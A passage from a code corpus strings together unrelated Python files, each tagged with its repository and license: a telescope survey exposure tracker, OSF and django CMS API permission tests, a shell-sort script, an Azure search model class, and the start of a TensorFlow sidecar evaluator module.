Moon-tile separation angle in degrees.
"""
mjd = start.mjd
self.log.info(
'Adding {0:.1f} exposure #{1:06d} of {2} at {3} (MJD {4:.5f}).'
.format(exptime, self.num_exp, tile_id, start.datetime, mjd))
row = self.get_tile(tile_id)
# Check that we have not reached the maximum allowed exposures.
num_exp = np.count_nonzero(row['mjd'] > 0)
if num_exp == self.max_exposures:
raise RuntimeError(
'Reached maximum exposure limit ({0}) for tile_id {1}.'
.format(self.max_exposures, tile_id))
# Check for increasing timestamps.
if mjd <= self._last_mjd:
raise ValueError('Exposure MJD {0:.5f} <= last MJD {1:.5f}.'
.format(mjd, self._last_mjd))
# Remember the most recent exposure.
self._last_mjd = mjd
self._last_tile = row
self._num_exp += 1
# Remember the first exposure's timestamp.
if self._first_mjd == 0:
self._first_mjd = mjd
# Save this exposure.
row['mjd'][num_exp] = mjd
row['exptime'][num_exp] = exptime.to(u.s).value
row['snr2frac'][num_exp] = snr2frac
row['airmass'][num_exp] = airmass
row['seeing'][num_exp] = seeing
row['transparency'][num_exp] = transparency
row['moonfrac'][num_exp] = moonfrac
row['moonalt'][num_exp] = moonalt
row['moonsep'][num_exp] = moonsep
# Update this tile's status.
row['status'] = 1 if row['snr2frac'].sum() < self.min_snr2 else 2
def get_exposures(self, start=None, stop=None,
tile_fields='tileid,pass,ra,dec,ebmv',
exp_fields=('night,mjd,exptime,seeing,transparency,' +
'airmass,moonfrac,moonalt,moonsep,' +
'program,flavor')):
"""Create a table listing exposures in time order.
Parameters
----------
start : date or None
First date to include in the list of exposures, or date of the
first observation if None.
stop : date or None
Last date to include in the list of exposures, or date of the
last observation if None.
tile_fields : str
Comma-separated list of per-tile field names to include. The
special name 'index' denotes the index into the visible tile array.
The special name 'ebmv' adds median E(B-V) values for each tile
from the tile design file.
exp_fields : str
Comma-separated list of per-exposure field names to include. The
special name 'snr2cum' denotes the cummulative snr2frac on each
tile, since the start of the survey. The special name 'night'
denotes a string YYYYMMDD specifying the date on which each
night starts. The special name 'lst' denotes the apparent local
sidereal time of the shutter open timestamp. The special name
'expid' denotes the index of each exposure in the full progress
record starting from zero.
Returns
-------
astropy.table.Table
Table with the specified columns as uppercase and one row per exposure.
"""
# Get MJD range to show.
if start is None:
start = self.first_mjd
start = desisurvey.utils.local_noon_on_date(
desisurvey.utils.get_date(start)).mjd
if stop is None:
stop = self.last_mjd
stop = desisurvey.utils.local_noon_on_date(
desisurvey.utils.get_date(stop)).mjd + 1
if start >= stop:
raise ValueError('Expected start < stop.')
# Build a list of exposures in time sequence.
table = self._table
mjd = table['mjd'].data.flatten()
order = np.argsort(mjd)
tile_index = (order // self.max_exposures)
# Assign each exposure a sequential index starting from zero.
ntot = len(mjd)
nexp = np.count_nonzero(mjd > 0)
expid = np.empty(ntot, int)
expid[order] = np.arange(nexp - ntot, nexp)
# Restrict to the requested date range.
first, last = np.searchsorted(mjd, [start, stop], sorter=order)
tile_index = tile_index[first:last + 1]
order = order[first:last + 1]
assert np.all(expid[order] >= 0)
# Create the output table.
tileinfo = None
output = astropy.table.Table()
output.meta['EXTNAME'] = 'EXPOSURES'
for name in tile_fields.split(','):
name = name.lower()
if name == 'index':
output[name.upper()] = tile_index
elif name == 'ebmv':
if tileinfo is None:
config = desisurvey.config.Configuration()
tileinfo = astropy.table.Table(
desimodel.io.load_tiles(onlydesi=True, extra=False,
tilesfile=config.tiles_file()))
assert np.all(tileinfo['TILEID'] == table['tileid'])
output[name.upper()] = tileinfo['EBV_MED'][tile_index]
else:
if name not in table.colnames or len(table[name].shape) != 1:
raise ValueError(
'Invalid tile field name: {0}.'.format(name))
output[name.upper()] = table[name][tile_index]
for name in exp_fields.split(','):
name = name.lower()
if name == 'snr2cum':
snr2cum = np.cumsum(
table['snr2frac'], axis=1).flatten()[order]
output[name.upper()] = astropy.table.Column(
snr2cum, format='%.3f',
description='Cummulative fraction of target S/N**2')
elif name == 'night':
mjd = table['mjd'].flatten()[order]
night = np.empty(len(mjd), dtype=(str, 8))
for i in range(len(mjd)):
night[i] = str(desisurvey.utils.get_date(mjd[i])).replace('-', '')
output[name.upper()] = astropy.table.Column(
night,
description='Date at start of night when exposure taken')
elif name == 'lst':
mjd = table['mjd'].flatten()[order]
times = astropy.time.Time(
mjd, format='mjd', location=desisurvey.utils.get_location())
lst = times.sidereal_time('apparent').to(u.deg).value
output[name.upper()] = astropy.table.Column(
lst, format='%.1f', unit='deg',
description='Apparent local sidereal time in degrees')
elif name == 'program':
exppass = table['pass'][tile_index]
try:
from desimodel.footprint import pass2program
program = pass2program(exppass)
except ImportError:
#- desimodel < 0.9.1 doesn't have pass2program, so
#- hardcode the mapping that it did have
program = np.empty(len(exppass), dtype=(str, 6))
program[:] = 'BRIGHT'
program[exppass < 4] = 'DARK'
program[exppass == 4] = 'GRAY'
proglen = len(max(program, key=len))
if proglen < 6: # need at least six characters for 'CALIB' program
proglen = 6
output[name.upper()] = astropy.table.Column(program,
dtype='<U{}'.format(proglen),
description='Program name')
elif name == 'flavor':
flavor = np.empty(len(exppass), dtype=(str, 7))
flavor[:] = 'science'
output[name.upper()] = astropy.table.Column(flavor,
description='Exposure flavor')
elif name == 'expid':
output[name.upper()] = astropy.table.Column(
expid[order], description='Exposure index')
else:
if name not in table.colnames or len(table[name].shape) != 2:
raise ValueError(
'Invalid exposure field name: {0}.'.format(name))
output[name.upper()] = table[name].flatten()[order]
return output
| desihub/desisurvey | py/desisurvey/old/progress.py | Python | bsd-3-clause | 26,909 |
import pytest
from django.utils import timezone
from api.base.settings.defaults import API_BASE
from django.contrib.auth.models import Permission
from osf.models import RegistrationSchema
from osf_tests.factories import (
ProjectFactory,
RegistrationFactory,
AuthUserFactory,
CollectionFactory,
DraftRegistrationFactory,
)
from osf.utils import permissions
from website.project.metadata.schemas import LATEST_SCHEMA_VERSION
from website.project.metadata.utils import create_jsonschema_from_metaschema
@pytest.mark.django_db
class DraftRegistrationTestCase:
@pytest.fixture()
def user(self):
return AuthUserFactory()
@pytest.fixture()
def user_write_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def user_read_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def user_non_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def project_public(self, user, user_write_contrib, user_read_contrib):
project_public = ProjectFactory(is_public=True, creator=user)
project_public.add_contributor(
user_write_contrib,
permissions=[permissions.WRITE])
project_public.add_contributor(
user_read_contrib,
permissions=[permissions.READ])
project_public.save()
return project_public
@pytest.fixture()
def prereg_metadata(self):
def metadata(draft):
test_metadata = {}
json_schema = create_jsonschema_from_metaschema(
draft.registration_schema.schema)
for key, value in json_schema['properties'].iteritems():
response = 'Test response'
if value['properties']['value'].get('enum'):
response = value['properties']['value']['enum'][0]
if value['properties']['value'].get('properties'):
response = {'question': {'value': 'Test Response'}}
test_metadata[key] = {'value': response}
return test_metadata
return metadata
@pytest.mark.django_db
class TestDraftRegistrationList(DraftRegistrationTestCase):
@pytest.fixture()
def schema(self):
return RegistrationSchema.objects.get(
name='Open-Ended Registration',
schema_version=LATEST_SCHEMA_VERSION)
@pytest.fixture()
def draft_registration(self, user, project_public, schema):
return DraftRegistrationFactory(
initiator=user,
registration_schema=schema,
branched_from=project_public
)
@pytest.fixture()
def url_draft_registrations(self, project_public):
return '/{}nodes/{}/draft_registrations/'.format(
API_BASE, project_public._id)
def test_admin_can_view_draft_list(
self, app, user, draft_registration,
schema, url_draft_registrations):
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['attributes']['registration_supplement'] == schema._id
assert data[0]['id'] == draft_registration._id
assert data[0]['attributes']['registration_metadata'] == {}
def test_cannot_view_draft_list(
self, app, user_write_contrib,
user_read_contrib, user_non_contrib,
url_draft_registrations):
# test_read_only_contributor_cannot_view_draft_list
res = app.get(
url_draft_registrations,
auth=user_read_contrib.auth,
expect_errors=True)
assert res.status_code == 403
# test_read_write_contributor_cannot_view_draft_list
res = app.get(
url_draft_registrations,
auth=user_write_contrib.auth,
expect_errors=True)
assert res.status_code == 403
# test_logged_in_non_contributor_cannot_view_draft_list
res = app.get(
url_draft_registrations,
auth=user_non_contrib.auth,
expect_errors=True)
assert res.status_code == 403
# test_unauthenticated_user_cannot_view_draft_list
res = app.get(url_draft_registrations, expect_errors=True)
assert res.status_code == 401
def test_deleted_draft_registration_does_not_show_up_in_draft_list(
self, app, user, draft_registration, url_draft_registrations):
draft_registration.deleted = timezone.now()
draft_registration.save()
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
def test_draft_with_registered_node_does_not_show_up_in_draft_list(
self, app, user, project_public, draft_registration, url_draft_registrations):
reg = RegistrationFactory(project=project_public)
draft_registration.registered_node = reg
draft_registration.save()
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
def test_draft_with_deleted_registered_node_shows_up_in_draft_list(
self, app, user, project_public,
draft_registration, schema,
url_draft_registrations):
reg = RegistrationFactory(project=project_public)
draft_registration.registered_node = reg
draft_registration.save()
reg.is_deleted = True
reg.save()
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['attributes']['registration_supplement'] == schema._id
assert data[0]['id'] == draft_registration._id
assert data[0]['attributes']['registration_metadata'] == {}
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestDraftRegistrationCreate(DraftRegistrationTestCase):
@pytest.fixture()
def metaschema_open_ended(self):
return RegistrationSchema.objects.get(
name='Open-Ended Registration',
schema_version=LATEST_SCHEMA_VERSION)
@pytest.fixture()
def payload(self, metaschema_open_ended):
return {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': metaschema_open_ended._id
}
}
}
@pytest.fixture()
def url_draft_registrations(self, project_public):
return '/{}nodes/{}/draft_registrations/'.format(
API_BASE, project_public._id)
def test_type_is_draft_registrations(
self, app, user, metaschema_open_ended,
url_draft_registrations):
draft_data = {
'data': {
'type': 'nodes',
'attributes': {
'registration_supplement': metaschema_open_ended._id
}
}
}
res = app.post_json_api(
url_draft_registrations,
draft_data, auth=user.auth,
expect_errors=True)
assert res.status_code == 409
def test_admin_can_create_draft(
self, app, user, project_public,
payload, metaschema_open_ended):
url = '/{}nodes/{}/draft_registrations/?embed=branched_from&embed=initiator'.format(
API_BASE, project_public._id)
res = app.post_json_api(url, payload, auth=user.auth)
assert res.status_code == 201
data = res.json['data']
assert data['attributes']['registration_supplement'] == metaschema_open_ended._id
assert data['attributes']['registration_metadata'] == {}
assert data['embeds']['branched_from']['data']['id'] == project_public._id
assert data['embeds']['initiator']['data']['id'] == user._id
def test_cannot_create_draft(
self, app, user_write_contrib,
user_read_contrib, user_non_contrib,
project_public, payload,
url_draft_registrations):
# test_write_only_contributor_cannot_create_draft
assert user_write_contrib in project_public.contributors.all()
res = app.post_json_api(
url_draft_registrations,
payload,
auth=user_write_contrib.auth,
expect_errors=True)
assert res.status_code == 403
# test_read_only_contributor_cannot_create_draft
assert user_read_contrib in project_public.contributors.all()
res = app.post_json_api(
url_draft_registrations,
payload,
auth=user_read_contrib.auth,
expect_errors=True)
assert res.status_code == 403
# test_non_authenticated_user_cannot_create_draft
res = app.post_json_api(
url_draft_registrations,
payload, expect_errors=True)
assert res.status_code == 401
# test_logged_in_non_contributor_cannot_create_draft
res = app.post_json_api(
url_draft_registrations,
payload,
auth=user_non_contrib.auth,
expect_errors=True)
assert res.status_code == 403
def test_registration_supplement_errors(
self, app, user, url_draft_registrations):
# test_registration_supplement_not_found
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': 'Invalid schema'
}
}
}
res = app.post_json_api(
url_draft_registrations,
draft_data, auth=user.auth,
expect_errors=True)
assert res.status_code == 404
# test_registration_supplement_must_be_active_metaschema
schema = RegistrationSchema.objects.get(
name='Election Research Preacceptance Competition', active=False)
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': schema._id
}
}
}
res = app.post_json_api(
url_draft_registrations,
draft_data, auth=user.auth,
expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Registration supplement must be an active schema.'
# test_registration_supplement_must_be_most_recent_metaschema
schema = RegistrationSchema.objects.get(
name='Open-Ended Registration', schema_version=1)
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': schema._id
}
}
}
res = app.post_json_api(
url_draft_registrations,
draft_data, auth=user.auth,
expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Registration supplement must be an active schema.'
def test_cannot_create_draft_errors(
self, app, user, project_public, payload):
# test_cannot_create_draft_from_a_registration
registration = RegistrationFactory(
project=project_public, creator=user)
url = '/{}nodes/{}/draft_registrations/'.format(
API_BASE, registration._id)
res = app.post_json_api(
url, payload, auth=user.auth,
expect_errors=True)
assert res.status_code == 404
# test_cannot_create_draft_from_deleted_node
project = ProjectFactory(is_public=True, creator=user)
project.is_deleted = True
project.save()
url_project = '/{}nodes/{}/draft_registrations/'.format(
API_BASE, project._id)
res = app.post_json_api(
url_project, payload,
auth=user.auth, expect_errors=True)
assert res.status_code == 410
assert res.json['errors'][0]['detail'] == 'The requested node is no longer available.'
# test_cannot_create_draft_from_collection
collection = CollectionFactory(creator=user)
url = '/{}nodes/{}/draft_registrations/'.format(
API_BASE, collection._id)
res = app.post_json_api(
url, payload, auth=user.auth,
expect_errors=True)
assert res.status_code == 404
def test_required_metaschema_questions_not_required_on_post(
self, app, user, project_public, prereg_metadata):
prereg_schema = RegistrationSchema.objects.get(
name='Prereg Challenge',
schema_version=LATEST_SCHEMA_VERSION)
prereg_draft_registration = DraftRegistrationFactory(
initiator=user,
registration_schema=prereg_schema,
branched_from=project_public
)
url = '/{}nodes/{}/draft_registrations/?embed=initiator&embed=branched_from'.format(
API_BASE, project_public._id)
registration_metadata = prereg_metadata(prereg_draft_registration)
del registration_metadata['q1']
prereg_draft_registration.registration_metadata = registration_metadata
prereg_draft_registration.save()
payload = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': prereg_schema._id,
'registration_metadata': registration_metadata
}
}
}
res = app.post_json_api(
url, payload, auth=user.auth,
expect_errors=True)
assert res.status_code == 201
data = res.json['data']
assert res.json['data']['attributes']['registration_metadata']['q2']['value'] == 'Test response'
assert data['attributes']['registration_supplement'] == prereg_schema._id
assert data['embeds']['branched_from']['data']['id'] == project_public._id
assert data['embeds']['initiator']['data']['id'] == user._id
def test_registration_supplement_must_be_supplied(
self, app, user, url_draft_registrations):
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
}
}
}
res = app.post_json_api(
url_draft_registrations,
draft_data, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'This field is required.'
assert errors['source']['pointer'] == '/data/attributes/registration_supplement'
def test_registration_metadata_must_be_a_dictionary(
self, app, user, payload, url_draft_registrations):
payload['data']['attributes']['registration_metadata'] = 'Registration data'
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['source']['pointer'] == '/data/attributes/registration_metadata'
assert errors['detail'] == 'Expected a dictionary of items but got type "unicode".'
def test_registration_metadata_question_values_must_be_dictionaries(
self, app, user, payload, url_draft_registrations):
schema = RegistrationSchema.objects.get(
name='OSF-Standard Pre-Data Collection Registration',
schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = 'No, data collection has not begun'
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'u\'No, data collection has not begun\' is not of type \'object\''
def test_registration_metadata_question_keys_must_be_value(
self, app, user, payload, url_draft_registrations):
schema = RegistrationSchema.objects.get(
name='OSF-Standard Pre-Data Collection Registration',
schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = {
'incorrect_key': 'No, data collection has not begun'}
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'Additional properties are not allowed (u\'incorrect_key\' was unexpected)'
def test_question_in_registration_metadata_must_be_in_schema(
self, app, user, payload, url_draft_registrations):
schema = RegistrationSchema.objects.get(
name='OSF-Standard Pre-Data Collection Registration',
schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['q11'] = {
'value': 'No, data collection has not begun'
}
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'Additional properties are not allowed (u\'q11\' was unexpected)'
def test_multiple_choice_question_value_must_match_value_in_schema(
self, app, user, payload, url_draft_registrations):
schema = RegistrationSchema.objects.get(
name='OSF-Standard Pre-Data Collection Registration',
schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = {
'value': 'Nope, data collection has not begun'}
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'u\'Nope, data collection has not begun\' is not one of [u\'No, data collection has not begun\', u\'Yes, data collection is underway or complete\']'
def test_reviewer_cannot_create_draft_registration(
self, app, user_read_contrib, project_public,
payload, url_draft_registrations):
user = AuthUserFactory()
administer_permission = Permission.objects.get(
codename='administer_prereg')
user.user_permissions.add(administer_permission)
user.save()
assert user_read_contrib in project_public.contributors.all()
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
assert res.status_code == 403
| erinspace/osf.io | api_tests/nodes/views/test_node_draft_registration_list.py | Python | apache-2.0 | 19,847 |
from __future__ import with_statement
import sys
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import FieldError
from django.template import TemplateDoesNotExist
from django.test.testcases import TestCase
from djangocms_text_ckeditor.cms_plugins import TextPlugin
from djangocms_text_ckeditor.models import Text
from menus.menu_pool import menu_pool
from cms.api import _generate_valid_slug, create_page, _verify_plugin_type, assign_user_to_page
from cms.apphook_pool import apphook_pool
from cms.constants import TEMPLATE_INHERITANCE_MAGIC
from cms.models.pagemodel import Page
from cms.plugin_base import CMSPluginBase
from cms.test_utils.util.context_managers import SettingsOverride
from cms.test_utils.util.menu_extender import TestMenu
from cms.test_utils.util.mock import AttributeObject
from cms.tests.apphooks import APP_MODULE, APP_NAME
from cms.utils.compat.dj import get_user_model
def _grant_page_permission(user, codename):
content_type = ContentType.objects.get_by_natural_key('cms', 'page')
perm = Permission.objects.get_or_create(codename='%s_page' % codename,
content_type=content_type)[0]
user.user_permissions.add(perm)
class PythonAPITests(TestCase):
def _get_default_create_page_arguments(self):
return {
'title': 'Test',
'template': 'nav_playground.html',
'language': 'en'
}
def test_generate_valid_slug(self):
title = "Hello Title"
expected_slug = "hello-title"
# empty db, it should just slugify
slug = _generate_valid_slug(title, None, 'en')
self.assertEqual(slug, expected_slug)
def test_generage_valid_slug_check_existing(self):
title = "Hello Title"
create_page(title, 'nav_playground.html', 'en')
# second time with same title, it should append -1
expected_slug = "hello-title-1"
slug = _generate_valid_slug(title, None, 'en')
self.assertEqual(slug, expected_slug)
def test_generage_valid_slug_check_parent(self):
title = "Hello Title"
page = create_page(title, 'nav_playground.html', 'en')
# second time with same title, it should append -1
expected_slug = "hello-title"
slug = _generate_valid_slug(title, page, 'en')
self.assertEqual(slug, expected_slug)
def test_generage_valid_slug_check_parent_existing(self):
title = "Hello Title"
page = create_page(title, 'nav_playground.html', 'en')
create_page(title, 'nav_playground.html', 'en', parent=page)
# second time with same title, it should append -1
expected_slug = "hello-title-1"
slug = _generate_valid_slug(title, page, 'en')
self.assertEqual(slug, expected_slug)
def test_invalid_apphook_type(self):
self.assertRaises(TypeError, create_page, apphook=1,
**self._get_default_create_page_arguments())
def test_invalid_template(self):
kwargs = self._get_default_create_page_arguments()
kwargs['template'] = "not_valid.htm"
with SettingsOverride(CMS_TEMPLATES=(("not_valid.htm", "notvalid"),)):
self.assertRaises(TemplateDoesNotExist, create_page, **kwargs)
kwargs['template'] = TEMPLATE_INHERITANCE_MAGIC
create_page(**kwargs)
def test_apphook_by_class(self):
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
apphooks = (
'%s.%s' % (APP_MODULE, APP_NAME),
)
with SettingsOverride(CMS_APPHOOKS=apphooks):
apphook_pool.clear()
apphook = apphook_pool.get_apphook(APP_NAME)
page = create_page(apphook=apphook,
**self._get_default_create_page_arguments())
self.assertEqual(page.get_application_urls('en'), APP_NAME)
def test_invalid_dates(self):
self.assertRaises(AssertionError, create_page, publication_date=1,
**self._get_default_create_page_arguments())
self.assertRaises(AssertionError, create_page, publication_end_date=1,
**self._get_default_create_page_arguments())
def test_nav_extenders_invalid_type(self):
if not menu_pool.discovered:
menu_pool.discover_menus()
self.old_menu = menu_pool.menus
menu_pool.menus = {'TestMenu': TestMenu()}
self.assertRaises(AssertionError, create_page, navigation_extenders=1,
**self._get_default_create_page_arguments())
menu_pool.menus = self.old_menu
def test_nav_extenders_invalid_menu(self):
if not menu_pool.discovered:
menu_pool.discover_menus()
self.old_menu = menu_pool.menus
menu_pool.menus = {}
self.assertRaises(AssertionError, create_page,
navigation_extenders=TestMenu,
**self._get_default_create_page_arguments())
menu_pool.menus = self.old_menu
def test_nav_extenders_valid(self):
if not menu_pool.discovered:
menu_pool.discover_menus()
self.old_menu = menu_pool.menus
menu_pool.menus = {'TestMenu': TestMenu()}
page = create_page(navigation_extenders='TestMenu',
**self._get_default_create_page_arguments())
self.assertEqual(page.navigation_extenders, 'TestMenu')
menu_pool.menus = self.old_menu
def test_verify_plugin_type_invalid_type(self):
self.assertRaises(TypeError, _verify_plugin_type, 1)
def test_verify_plugin_type_string(self):
plugin_model, plugin_type = _verify_plugin_type("TextPlugin")
self.assertEqual(plugin_model, Text)
self.assertEqual(plugin_type, 'TextPlugin')
def test_verify_plugin_type_string_invalid(self):
self.assertRaises(TypeError, _verify_plugin_type, "InvalidPlugin")
def test_verify_plugin_type_plugin_class(self):
plugin_model, plugin_type = _verify_plugin_type(TextPlugin)
self.assertEqual(plugin_model, Text)
self.assertEqual(plugin_type, 'TextPlugin')
def test_verify_plugin_type_invalid_plugin_class(self):
class InvalidPlugin(CMSPluginBase):
model = Text
self.assertRaises(AssertionError, _verify_plugin_type, InvalidPlugin)
def test_assign_user_to_page_nothing(self):
page = create_page(**self._get_default_create_page_arguments())
user = get_user_model().objects.create_user(username='user', email='[email protected]',
password='user')
user.is_staff = True
request = AttributeObject(user=user)
self.assertFalse(page.has_change_permission(request))
def test_assign_user_to_page_single(self):
page = create_page(**self._get_default_create_page_arguments())
user = get_user_model().objects.create_user(username='user', email='[email protected]',
password='user')
user.is_staff = True
user.save()
request = AttributeObject(user=user)
assign_user_to_page(page, user, can_change=True)
self.assertFalse(page.has_change_permission(request))
self.assertFalse(page.has_add_permission(request))
_grant_page_permission(user, 'change')
page = Page.objects.get(pk=page.pk)
user = get_user_model().objects.get(pk=user.pk)
request = AttributeObject(user=user)
self.assertTrue(page.has_change_permission(request))
self.assertFalse(page.has_add_permission(request))
def test_assign_user_to_page_all(self):
page = create_page(**self._get_default_create_page_arguments())
user = get_user_model().objects.create_user(username='user', email='[email protected]',
password='user')
user.is_staff = True
user.save()
request = AttributeObject(user=user)
assign_user_to_page(page, user, grant_all=True)
self.assertFalse(page.has_change_permission(request))
self.assertTrue(page.has_add_permission(request))
_grant_page_permission(user, 'change')
_grant_page_permission(user, 'add')
page = Page.objects.get(pk=page.pk)
user = get_user_model().objects.get(pk=user.pk)
request = AttributeObject(user=user)
self.assertTrue(page.has_change_permission(request))
self.assertTrue(page.has_add_permission(request))
def test_page_overwrite_url_default(self):
self.assertEqual(Page.objects.all().count(), 0)
home = create_page('home', 'nav_playground.html', 'en', published=True)
self.assertTrue(home.is_published('en', True))
self.assertTrue(home.is_home)
page = create_page(**self._get_default_create_page_arguments())
self.assertFalse(page.is_home)
self.assertFalse(page.get_title_obj_attribute('has_url_overwrite'))
self.assertEqual(page.get_title_obj_attribute('path'), 'test')
def test_create_page_can_overwrite_url(self):
page_attrs = self._get_default_create_page_arguments()
page_attrs["overwrite_url"] = 'test/home'
page = create_page(**page_attrs)
self.assertTrue(page.get_title_obj_attribute('has_url_overwrite'))
self.assertEqual(page.get_title_obj_attribute('path'), 'test/home')
def test_create_reverse_id_collision(self):
create_page('home', 'nav_playground.html', 'en', published=True, reverse_id="foo")
self.assertRaises(FieldError, create_page, 'foo', 'nav_playground.html', 'en', published=True, reverse_id="foo")
self.assertTrue(Page.objects.count(), 2)
| amaozhao/basecms | cms/tests/api.py | Python | mit | 9,853 |
import random
def shellSort(array):
n = len(array)
gap = n/2
while gap > 0:
for i in range(gap,n):
temp = array[i]
j = i
while j >= gap and array[j-gap] >temp:
array[j] = array[j-gap]
j -= gap
array[j] = temp
gap /= 2
array = []
for i in range(0,1000000):
array.append(random.randint(1,1000000));
shellSort(array)
print(array[0])
| parcpaes/cplus | vectors/shellSort.py | Python | lgpl-2.1 | 459 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .thing import Thing
class Organization(Thing):
"""Defines an organization.
Variables are only populated by the server, and will be ignored when
sending a request.
:param _type: Constant filled by server.
:type _type: str
:ivar id: A String identifier.
:vartype id: str
:ivar web_search_url: The URL To Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by
this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image:
~azure.cognitiveservices.search.newssearch.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
"""
_validation = {
'_type': {'required': True},
'id': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
}
def __init__(self):
super(Organization, self).__init__()
self._type = 'Organization'
| lmazuel/azure-sdk-for-python | azure-cognitiveservices-search-newssearch/azure/cognitiveservices/search/newssearch/models/organization.py | Python | mit | 1,967 |
# Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python module for evaluation loop."""
# pylint: disable=g-direct-tensorflow-import
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import checkpoint_utils
from tensorflow.python.training.tracking import util as tracking_util
_PRINT_EVAL_STEP_EVERY_SEC = 60.0
_ITERATIONS_UNINITIALIZED = -1
def list_checkpoint_attributes(ckpt_dir_or_file):
"""Lists all the attributes in a checkpoint.
Checkpoint keys are paths in a checkpoint graph, and attribute is the first
element in the path. e.g. with a checkpoint key
"optimizer/iter/.ATTRIBUTES/VARIABLE_VALUE", optimizer is the attribute. The
attribute is also used to save/restore a variable in a checkpoint,
e.g. tf.train.Checkpoint(optimizer=optimizer, model=model).
Args:
ckpt_dir_or_file: Directory with checkpoints file or path to checkpoint.
Returns:
Set of attributes in a checkpoint.
"""
reader = checkpoint_utils.load_checkpoint(ckpt_dir_or_file)
variable_map = reader.get_variable_to_shape_map()
return {name.split('/')[0] for name in variable_map.keys()}
class SidecarEvaluator(object):
"""A class designed for a dedicated evaluator task.
`SidecarEvaluator` is expected to be run in a process on a separate machine
from the training cluster. It is meant for the purpose of a dedicated
evaluator, evaluating the metric results of a training cluster which has one
or more workers performing the training, and saving checkpoints.
The `SidecarEvaluator` API is compatible with both Custom Training Loop (CTL),
and Keras `Model.fit` to be used in the training cluster. Using the model
(with compiled metrics) provided at `__init__`, `SidecarEvaluator` repeatedly
performs evaluation "epochs" when it finds a checkpoint that has not yet been
used. Depending on the `steps` argument, an eval epoch is evaluation over all
eval data, or up to certain number of steps (batches). See examples below for
how the training program should save the checkpoints in order to be recognized
by `SidecarEvaluator`.
Since under the hood, `SidecarEvaluator` uses `model.evaluate` for evaluation,
it also supports arbitrary Keras callbacks. That is, if one or more callbacks
are provided, their `on_test_batch_begin` and `on_test_batch_end` methods are
called at the start and end of a batch, and their `on_test_begin` and
`on_test_end` are called at the start and end of an evaluation epoch. Note
that `SidecarEvaluator` may skip some checkpoints because it always picks up
the latest checkpoint available, and during an evaluation epoch, multiple
